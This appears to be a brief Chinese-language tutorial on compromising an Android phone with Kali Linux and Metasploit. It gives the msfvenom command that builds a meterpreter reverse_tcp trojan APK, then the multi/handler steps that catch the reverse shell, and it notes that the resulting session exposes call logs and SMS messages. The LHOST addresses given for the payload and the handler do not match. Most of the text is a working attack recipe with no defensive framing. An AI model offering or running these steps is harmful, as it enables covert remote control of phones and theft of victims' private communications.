渗透机:kali2017.3
靶机:安卓手机一部
首先我们需要生成一个安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
LHOST 本地的IP地址
LPORT 反向连接到主机的端口
R> 木马生成的保存输出路径
至于木马的免杀暂且不谈。
然后打开msfconsole
msf > use exploit/multi/handler 设置模块
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 设置payload为反向tcp连接
msf exploit(multi/handler) > show options 查看参数
set lhost 192.168.11.111 设置本地的IP地址
set lport 5555 设置端口,跟前面生成木马连接的端口号要对应一样
msf exploit(multi/handler) > show options 查看参数
然后执行
msf exploit(multi/handler) > exploit -j
获取一个安卓手机的session,我们可以获取当前通话记录,聊天短信等信息
下面是我从网上找的一些参数的释义。
剩下的就自个慢慢玩吧,我就先撤了。。。。。。。